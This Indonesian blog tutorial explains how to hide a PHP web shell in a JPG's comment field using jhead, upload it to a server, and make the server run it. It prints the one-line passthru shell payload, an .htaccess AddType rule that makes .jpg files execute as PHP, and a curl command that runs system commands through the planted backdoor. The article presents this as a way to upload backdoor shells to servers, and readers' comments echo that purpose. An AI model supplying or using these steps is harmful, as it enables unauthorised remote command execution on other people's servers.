Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead - STUCKCODE

Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead

Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead, Ada banyak cara untuk upload shell backdoor ke server salah satunya yaitu dengan menggunakan Gambar JPG yang sudah disisipkan Script PHP. Teknik tersebut juga dinamakan dengan Steganografi dimana pengertian dari steganografi adalah seni dan ilmu menulis pesan tersembunyi dengan kata lain teknik menyembunyikan pesan dengan suatu cara salah satunya menggunakan tool Jhead.

Jadi, selain pihak pengirim dan penerima pesan, tidak ada yang tahu dan menyadari bahwa ada suatu pesan rahasia dalam Gambar JPG. sobat saya kemarin explore sendiri dan menemukan bahwa steganografi juga bisa menggunakan tool Jhead ,dan bisa juga disisipi script php ke dalam gambar loh. selain tool jhead, ada lagi tool yaitu exiftool, gwe makai tool jhead sesuai mood gwe, kalau sobat gimana nih? apakah sama dengan gwe, jika iya komen ya sob.

 Cara Install Tool Jhead dan Exiftool

Jhead
sudo apt-get install jhead
Open terminal atau bisa menekan CTRL + ALT + T dan ketikkan perintah diatas, tunggu sampai selesai.

Gambar 
Sobat bisa menggunkan gambar dengan format jpg, dan gwe taruh di direktori /root/boruto.jpg

Selanjutnya buka Direktori penyimpanan gambar dan klik kanan -> open terminal.

JIka sudah ditampilan terminal, sobat ketikkan perintah untuk memurnikan filenya, dimana dapat diartikan untuk menghapus comment atau script yang sudah disisipkan sebelumnya.
jhead -purejpg nama_file.jpg


selanjutnya ketikkan perintah
Jhead
jhead -cs nama_file.jpg




Berikutnya jendela editor vim akan muncul dan kalian tinggal masukin comment dengan script php seperti dibawah
<?php passthru($_POST['cmd']); __halt_compiler();

Dan kalian save, caranya sobat tekan tombol escape atau esc dan ketikkan  :wq


JIka berhasil maka outpunya akan seperti gambar diatas, Selanjutnya sobat tinggal upload di uploader, agar bisa masuk ke server sobat harus upload file .httaccess dan masukkan script dibawah pada file .httacces
Addtype application/x-https-php .jpg

Berfungsi untuk dapat membaca script php didalamnya walaupun filenya bukan php

Dan akses shell bacdoor kalian yang sudah terupload di server dengan perintah

curl -d cmd="uname -a; anjay; id" http://domain.com/boruto.jpg

Gimana sob? Mudah kan sekian tutorial Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead, semoga tutorial tersebut bermanfaat.
Naka chan
Naka chan Rak peduli karo omongane wong, seng penting aku terus melangkah

7 comments for "Cara Menyisipkan Script PHP ke Gambar JPG dengan Jhead"

  1. Makasih.
    Selama ini q nyari2 akhirnya ada juga bahasan dengan kalimat yg mudah dicerna.

    Admin
    biropesona.blogspot.com

    ReplyDelete
  2. Thanks gan, sangat membantu dan mudah dipahami. Kemarin saya nyari-nyari rata rata sulit untuk dipahami. Oh iya gan selain pake jhead, Steganografi bisa pake apa lagi?

    ReplyDelete
  3. nice info gan, ijin mempraktekkan semoga berhasil.

    ReplyDelete
  4. Saya pernah belajar php, susah-susah gampang. Kalo nggak sabaran, dah tak banting-banting laptopnya. Tapi, sayang laptop dong hehe. Infonya menarik, bisa dicoba bagi temen-temen yang sedang kesusahan untuk upload shell backdoor ke server. Bisa dicoba cara agan di atas :D

    Gudluck bagi para pembelajar semuanya hehe

    ReplyDelete
  5. manfaatnya apa bro, disini belum dijelaskan apa yah

    ReplyDelete

Post a Comment

Saya tunggu komentar positif dari anda dan jika ada pertanyaan seputar artikel ini silahkan berkomentar, jgn sungkan ya gan